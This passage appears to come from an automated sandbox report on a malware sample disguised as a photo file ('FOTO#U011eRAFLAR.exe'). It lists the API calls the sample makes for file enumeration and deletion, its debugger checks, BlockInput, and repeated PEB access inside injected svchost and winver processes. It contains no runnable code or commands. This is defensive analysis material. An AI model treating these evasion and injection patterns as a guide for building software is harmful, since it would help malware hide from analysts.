                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7CF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D7CF94
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7D2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D7D2C7
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D89560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D89560
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D896BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D896BB
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7DADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00D7DADC
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D89A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00D89A49
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D85BB5 FindFirstFileW,FindNextFileW,FindClose,0_2_00D85BB5
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0084C750 FindFirstFileW,FindNextFileW,FindClose,6_2_0084C750
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D1615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D1615E
                Source: GhotoFFnRo.exe, 00000007.00000002.3545851114.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                Source: winver.exe, 00000006.00000002.3545292765.0000000000C05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                Source: firefox.exe, 00000008.00000002.2311686726.00000231A23DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417C73 LdrLoadDll,1_2_00417C73
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D8E9C9 BlockInput,0_2_00D8E9C9
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D1445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00D1445D
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D1615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D1615E
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D34C78 mov eax, dword ptr fs:[00000030h]0_2_00D34C78
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_012366E0 mov eax, dword ptr fs:[00000030h]0_2_012366E0
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_01237D20 mov eax, dword ptr fs:[00000030h]0_2_01237D20
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_01237D80 mov eax, dword ptr fs:[00000030h]0_2_01237D80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h]1_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h]1_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h]1_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038663FF mov eax, dword ptr fs:[00000030h]1_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h]1_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h]1_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h]1_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h]1_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h]1_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h]1_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390634F mov eax, dword ptr fs:[00000030h]1_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D437C mov eax, dword ptr fs:[00000030h]1_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h]1_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h]1_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382823B mov eax, dword ptr fs:[00000030h]1_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h]1_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h]1_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390625D mov eax, dword ptr fs:[00000030h]1_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h]1_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836259 mov eax, dword ptr fs:[00000030h]1_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382826B mov eax, dword ptr fs:[00000030h]1_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03870185 mov eax, dword ptr fs:[00000030h]1_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h]1_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h]1_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h]1_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h]1_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860124 mov eax, dword ptr fs:[00000030h]1_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]1_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]1_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]1_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]1_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h]1_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]1_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]1_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]1_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]1_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]1_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]1_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]1_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]1_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]1_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]1_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]1_2_0382C020
